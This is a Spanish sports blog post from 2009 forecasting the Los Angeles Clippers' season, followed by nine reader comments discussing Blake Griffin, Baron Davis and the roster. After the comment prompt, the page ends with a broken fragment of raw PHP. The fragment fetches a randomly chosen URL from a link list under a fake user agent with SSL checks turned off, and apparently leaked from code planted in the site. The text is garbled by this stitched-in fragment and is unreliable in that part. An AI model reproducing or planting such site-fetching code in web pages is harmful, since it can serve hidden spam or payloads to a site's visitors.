Los Angeles Clippers: La promesa de un mundo mejor (o menos malo)

03 de October de 2009 por TheDeerHunter

Los Clippers se lucieron el pasado curso con un rendimiento, sin temor a equivocarnos, absolutamente bochornoso. Como premio, más por sus 63 derrotas que por sus 19 victorias, les tocó elegir a Blake Griffin como indiscutible nº1 del draft, capaz, según los entendidos, de cambiar de una vez por todas el mal sabor de boca que les dejó las anteriores primeras elecciones de los señores Olowakandi y Danny Manning.

Lo cierto es que Griffin, aún habiendo sido elegido por los Clippers, tiene buena pinta y ellos han demostrado querer dejarle sitio traspasando a Zach Randolph, lo poco remotamente aceptable del año pasado. Se supone que es la versión corregida y mejorada de Carlos Boozer (porque si a lo sumo es como él tampoco entendemos tanto revuelo) Lo que sí parece como mínimo es más atlético ya que sólo hay que ver la infinidad de youtubes que protagoniza… Lo único cierto es que es el máximo candidato de largo a rookie del año.

Por dentro le debería acompañar Chris Kaman si se encuentra la manera de mantenerlo sano durante una parte significativa de la temporada. El año pasado se perdió casi dos tercios del curso, y el anterior (su mejor campaña) casi un tercio. Un verdadero contratiempo para un contrato de más de 10 “kilos”/año. En cualquier caso, no hay motivos para pensar que la cosa seguirá así de mal y en condiciones normales es un extraordinario center, con un perfil altamente compatible al que se le presupone a Griffin. Esté o no al 100%, la posición se encuentra más que correctamente cubierta con Marcus Camby, que para colmo es un suculento expiring de 9 millones de dólares por si hiciera falta. El juego interior se completa con Craig Smith, procedente de Minnesotta, un gregario con buena mano que puede darle sus 15-20 minutos de descanso al rookie, DeAndré Jordan que ya demostró su capacidad defensiva en los contados minutos que dispuso el año pasado e incluso el sempiterno Brian Skinner al que todos conocemos sobradamente. No podemos negar que están razonablemente bien armados por dentro, a expensas de lo que demuestre su deslumbrante nuevo crack.

Pero es que por fuera tampoco son precisamente mancos. Al Thornton inicia el año de su primera renovación y que a nadie le extrañe que se vaya a los 20 puntos por noche. Eric Gordon demostró como Rookie que era bastante más que un digno sustituto de Cuttino y Baron Davis hasta hace nada era considerado como uno de los jugones más desequilibrantes de toda la liga. Calidad tiene de sobra, eso lo sabemos todos, así que no se entiende  en asoluto qué es lo que sucede en el equipo pobre de L.A.

De suplentes se han traído a Sebastian Telfair y Rasual Butler. El primero es un base aprovechable que coqueteó por momentos con la titularidad pero que no ha terminado de explotar en Minnesotta y que ha salido por la puerta de atrás en la frustrada operación Ricky Rubio. Butler en cambio hizo el año pasado la mejor temporada de su vida, siendo titular en New Orleans y destapándose como un correcto recambio en la anotación. Por último tenemos a Ricky Davis, del que ya esperamos más bien poco a estas alturas, y a Mardy Collins y Steven Novak, que si todo fuera bien no deberían entrar mucho en la rotación.

Es una plantilla muy correcta, bien compensada… para dar mucha guerra en el “NBA 2K”, cuanto menos. Y es que hay un detalle importante: si en medio de la crisis económica que azota todo, apreciamos una fractura entre dos “castas” de equipos, los que buscan el anillo y se refuerzan mucho contra los que no lo buscan y se debilitan, ciertamente los Clippers no parecen más débiles que el pasado año (sería bastante difícil, además). Con esto no queremos decir que ningún iluso les considere candidatos, pero sí es cierto que en esa clase media-baja que parece tan devaluada los Clippers salen reforzados. Y que a nadie le extrañe nada si esta es una de esas raras temporadas en el que el equipo pobre de L.A. parece eso, un equipo.

Si no conociéramos la escasa exigencia deportiva que caracteriza en la franquicia y el desequilibrio existente entre los intereses económicos frente al gusto por el talento podríamos pensar que este es un interesante proyecto con muchas posibilidades de consolidación. También pensaríamos que Mike Dunleavy se la juega definitivamente tras 7 temporadas más bien mediocres en las que no no llega al 40% de victorias. Si esto sigue así y no le echan será la confirmación de que han hecho suyo el credo que nos decían nuestras mamás: “Lo importante no es ganar sino participar”

Quinteto inicial: Baron Davis, Eric Gordon, Al Thorton, Blake Griffin y Chris Kaman

6º Hombre: Marcus Camby o Telfair.
Pronóstico: 1ª Ronda.

Comenta

9 comentarios a esta entrada

  1. Kiki dice:
    #1

    Sosetes.

      Citar

  2. L.Casei dice:
    #2

    Siguiendo con el análisis profundo, coincido: sosetes.

      Citar

  3. Txusma dice:
    #3

    Ahí, añadiendo matices al análisis… 😀

    Pues a lo mejor me conformo con bien poquita cosa pero no los veo sosetes. El hecho de que no vayan a disputar el titulo no significa directamente q no tengan interes. El año pasado de Davis no fue muy bueno pero cualquier equipo en el q juegue no puede ser condirado sosete. Y el trio Eric Gordon-Al Thorton-Blake Griffin es de lo mas intregante e ilusionante para los aficionados angelinos. Un ojito encima les vamos a poner.

      Citar

  4. Viva_Dirk dice:
    #4

    Yo tampoco los veo para nada sosetes, de hecho os parecen sosetes pero no os he visto sorprendidos de que Deer les halla dado como 1ª ronda.

    Con Davis sano y Kaman jugando 60 partidos tendrian muchísimo ganado, ambos de los mejores en sus puestos e ideales para que el trío que nombra Txus desarrolle todo su potencial. Y además tienen una segunda unidad muy apañada, me gusta el equipo.

    Yo también los veo en play-offs, y una vez ahí a mi no me gustaría cruzarme con un equipo con tal cantidad de talento por metro cuadrado.

      Citar

  5. Dantley2 dice:
    #5

    A mí estos me parecen menos sosetes, mira por donde. Buena parte del número de victorias dependerá de la salud de Davis, Kaman y hasta Camby. Eric Gordon huele a potencial jugador franquicia, para mí fue una sorpresa, no esperaba tanto. Al Thornton veremos, tengo dudas, y Blake Griffin creo que será un gran jugador NBA, pero no lo veo superestrella, aunque si hacen las cosas bien, estos Clippers pintan mejor.

      Citar

  6. kantonyo dice:
    #6

    Pues yo tengo muchas ganas de ver como funciona Blake Griffin. El año pasado en la NCAA parecia un cadete jugando con alevines, su poderio en la zona fue abismal, y es interesante saber como se va a comportar contra pívots NBA, mucho más expertos y potentes debajo del aro. Podemos estar ante una estrella en los próximos años.

    Y por lo demás, Thornton y Gordon el año pasado fueron las dos unicas noticias positivas en Clippers y tambíen se espera mucho de ellos. Sin olvidarnos de DeAndre Jordan, el cual recordar hizo un partidazo contra Lakers, provocando posiblemente uno de los peores partidos de Pau Gasol del año.

    Felicito a Deer por su analisis, y por su arriesgada apuesta de que llegaran a playoffs. La clave estará sin duda en lo que aporte Baron Davis. Yo creo que lucharan hasta el final por el 8º puesto con 40-45 victorias, pero me cuesta creer que lo logren, sobre todo por su corta plantilla.

      Citar

  7. Landrusski dice:
    #7

    Yo quiero ver si griffin demuestra las maravillas que dicen de el…la verdad esque no e visto la NCAA por tanto no puedo hablar de el…si es tan bueno como dicen entonces clippers lo veo el 6 o el 7 en la conferencia oeste…eso si a las primeras de cambio fuera…habra que ver si este año”reaparece” baron davis…porque vaya añito se marco el pasado…Eric gordon para mi es un interesantisimo jugador, y al thorton que apenas lo nombrais me parece que si pule defectos a poco que mejore este equipo es bastante bueno…lo dixo en 1 ronda de playoffs para keli…pero la mejoria es evidente

      Citar

  8. Jabho dice:
    #8

    Lo mejor para los Clippers es haber largado a Zach que en mala hora lo ficharon. Luego, aun sin una aportación estelar de Griffin, el equipo es bueno y con buena quimica y un Kaman de 60 partidos pueden ser muy competitivos.

    El que también debe empezar a hacerselo mirar es Dunleavy, que nunca es capaz de sacar partido de las plantilla que tiene (cuadriculadillo que es uno…), que no son malas.

    A mi Baron me encantan cuando está enchufado, será cuestión de enchufarle, porque cuando está on fire es capaz de arrastrar a todo el equipo a una dinámica positiva. Los 3 jóvenes son muy interesantes. Kaman/Camby de centers son una pareja de lujo. Lo dicho, si no compiten habría que empezar a mirar al entrenador.

      Citar

  9. TheDeerHunter dice:
    #9

    Pues empiezan bonicos…
    Griffin 6-8 semanas de baja.

    Si antes lo decimos…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>